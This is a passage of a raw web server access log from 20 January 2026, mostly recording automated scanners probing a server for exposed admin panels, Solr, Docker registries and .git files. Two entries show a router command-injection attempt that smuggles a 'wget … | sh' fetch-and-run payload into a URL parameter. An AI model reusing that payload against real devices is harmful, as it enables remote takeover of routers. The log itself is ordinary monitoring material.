[Gzip -] "-" "-" +[20/Jan/2026:03:53:10 +0000] 404 - GET http 91.82.83.208 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[20/Jan/2026:03:56:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:04:17:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:04:24:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:04:28:27 +0000] 404 - GET http 91.82.83.208 "/login" [Client 103.252.89.75] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[20/Jan/2026:04:29:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.81.222.85] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[20/Jan/2026:04:29:47 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:04:29:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 44.199.14.68] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:04:38:29 +0000] 400 - GET http 91.82.83.208 "/" [Client 206.168.34.48] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:04:38:29 +0000] 400 - - http localhost "-" [Client 206.168.34.48] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:04:38:32 +0000] 400 - GET http 91.82.83.208 "/security.txt" [Client 206.168.34.48] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:04:41:59 +0000] 400 - GET http localhost "/" [Client 165.232.76.168] [Length 252] [Gzip -] "-" "-" +[20/Jan/2026:04:42:00 +0000] 400 - POST http 91.82.83.208 "/sdk" [Client 165.232.76.168] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:04:42:00 +0000] 400 - GET http 91.82.83.208 "/odinhttpcall1768884119" [Client 165.232.76.168] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:04:42:01 +0000] 400 - GET http 91.82.83.208 "/HNAP1" [Client 165.232.76.168] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:04:42:01 +0000] 400 - GET http 91.82.83.208 "/evox/about" [Client 165.232.76.168] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:04:42:02 +0000] 400 - GET http localhost "/" [Client 165.232.76.168] [Length 252] [Gzip -] "-" "-" +[20/Jan/2026:04:42:03 +0000] 400 - GET http 91.82.83.208 "/" [Client 165.232.76.168] [Length 252] [Gzip -] "-" "-" +[20/Jan/2026:04:42:03 +0000] 400 - GET http 91.82.83.208 "/query?q=SHOW+DIAGNOSTICS" [Client 64.226.120.143] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:04:42:03 +0000] 400 - GET http 91.82.83.208 "/solr/admin/info/system" [Client 46.101.104.139] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:04:42:03 +0000] 400 - GET http 91.82.83.208 "/v2/_catalog" [Client 165.232.126.88] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:04:42:03 +0000] 400 - GET http 91.82.83.208 "/" [Client 209.38.233.252] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:04:42:03 +0000] 400 - GET http 91.82.83.208 "/cgi-bin/authLogin.cgi" [Client 64.226.123.76] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:04:42:03 +0000] 400 - GET http 91.82.83.208 "/solr/admin/cores?action=STATUS&wt=json" [Client 46.101.104.139] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:04:43:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.7] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:04:48:43 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:05:19:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:05:23:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:05:24:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:05:25:39 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[20/Jan/2026:05:27:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.132.23.201] [Length 0] [Gzip -] "-" "-" +[20/Jan/2026:05:27:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.132.23.201] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[20/Jan/2026:05:31:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.132.23.201] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:05:34:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.132.23.201] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:05:35:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.132.23.201] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:05:35:35 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:05:52:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.43.147] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:06:11:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:06:21:24 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:06:25:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 78.128.46.233] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117." "-" +[20/Jan/2026:06:30:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.62.197.47] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:31:24 +0000] 404 - GET http 91.82.83.208 "/webui/" [Client 64.62.197.47] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/101.0.4951.41 Safari/537.36" "-" +[20/Jan/2026:06:32:44 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:06:33:32 +0000] 404 - GET http 91.82.83.208 "/geoserver/web/" [Client 64.62.197.47] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:56:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:06:57:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:07:03:59 +0000] 404 - GET http 91.82.83.208 "/portal/redlion" [Client 74.235.100.212] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[20/Jan/2026:07:06:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:07:07:19 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:07:23:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:07:26:35 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 176.32.195.85] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko" "-" +[20/Jan/2026:07:37:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 184.105.247.254] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:07:50:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:07:53:49 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:07:55:58 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:08:04:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:08:21:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 35.205.235.254] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[20/Jan/2026:08:28:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:08:35:55 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:08:38:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:08:42:17 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:08:55:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.135.182.95] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:09:06:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 209.38.94.78] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[20/Jan/2026:09:06:31 +0000] 405 - POST http 91.82.83.208 "/" [Client 209.38.94.78] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[20/Jan/2026:09:07:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:09:07:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:09:26:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:09:43:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.215.0.144] [Length 1033] [Gzip -] "fasthttp" "-" +[20/Jan/2026:09:43:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:09:43:13 +0000] 404 - GET http 91.82.83.208 "/aaa9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[20/Jan/2026:09:43:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:09:43:13 +0000] 404 - GET http 91.82.83.208 "/aab9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[20/Jan/2026:09:58:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:10:01:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:10:15:53 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:10:23:46 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:10:25:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:10:35:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:10:37:53 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:10:38:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.8] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:10:38:33 +0000] 404 - GET http 91.82.83.208 "/aaa9" [Client 45.91.64.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[20/Jan/2026:10:38:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.8] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:10:38:33 +0000] 404 - GET http 91.82.83.208 "/aab9" [Client 45.91.64.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[20/Jan/2026:10:54:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:10:56:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:11:12:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.40] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:11:16:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:11:28:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:11:40:52 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 213.209.159.181] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "-" +[20/Jan/2026:12:03:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:12:05:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:09:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:12:12:06 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208:80/home.asp" +[20/Jan/2026:12:15:04 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 165.22.65.58] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:12:15:04 +0000] 404 - GET http 91.82.83.208 "/odinhttpcall1768911304" [Client 165.22.65.58] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:12:15:04 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 165.22.65.58] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:12:15:04 +0000] 404 - POST http 91.82.83.208 "/sdk" [Client 165.22.65.58] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:12:15:04 +0000] 404 - GET http 91.82.83.208 "/HNAP1" [Client 165.22.65.58] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:12:15:04 +0000] 404 - GET http 91.82.83.208 "/evox/about" [Client 165.22.65.58] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:12:15:04 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 165.22.65.58] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:12:15:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 165.22.65.58] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:12:15:05 +0000] 404 - GET http 91.82.83.208 "/solr/admin/info/system" [Client 64.226.81.53] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:12:15:05 +0000] 404 - GET http 91.82.83.208 "/query?q=SHOW+DIAGNOSTICS" [Client 209.38.233.252] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:12:15:05 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/authLogin.cgi" [Client 46.101.126.219] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:12:15:05 +0000] 404 - GET http 91.82.83.208 "/solr/admin/cores?action=STATUS&wt=json" [Client 64.226.81.53] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:12:15:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.226.120.143] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:15:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.226.120.143] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:22:01 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 157.230.220.136] [Length 1033] [Gzip -] "\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\x22" "-" +[20/Jan/2026:12:22:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.227.11.241] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0" "-" +[20/Jan/2026:12:22:53 +0000] 400 - GET http 91.82.83.208 "/" [Client 64.227.11.241] [Length 252] [Gzip -] "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0" "-" +[20/Jan/2026:12:22:59 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:22:59 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:00 +0000] 400 - GET http 91.82.83.208 "/" [Client 64.227.11.241] [Length 252] [Gzip -] "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0" "-" +[20/Jan/2026:12:23:00 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:00 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:00 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:01 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:01 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:06 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:07 +0000] 400 - - http localhost "-" [Client 64.227.11.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:23:31 +0000] 404 - GET http 91.82.83.208 "/v2/_catalog" [Client 165.227.136.251] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[20/Jan/2026:12:26:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 46.101.104.139] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[20/Jan/2026:12:26:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.226.120.143] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[20/Jan/2026:12:26:48 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:12:26:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.226.120.143] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:27:00 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:27:00 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)" [Client 221.159.119.6] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:36:44 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:12:39:27 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.187.35.158] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:12:41:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:43:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 129.226.213.145] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:12:44:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 134.122.73.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:44:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 134.122.73.241] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:12:44:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 134.122.73.241] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 